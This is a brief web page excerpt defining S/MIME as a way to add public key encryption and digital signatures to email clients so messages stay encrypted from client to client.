S/MIME (Secure/Multipurpose Internet Mail Extensions) provides a way to integrate public key
encryption and digital signatures into most modern email clients. This would encrypt all email
information from client to client, regardless of the communication used between email servers.
Related documents
ElectronConfiggraphicOrganizer2022
ElectronConfiggraphicOrganizer2022
Activity 4- Final (Evidence)
Activity 4- Final (Evidence)
Download
advertisement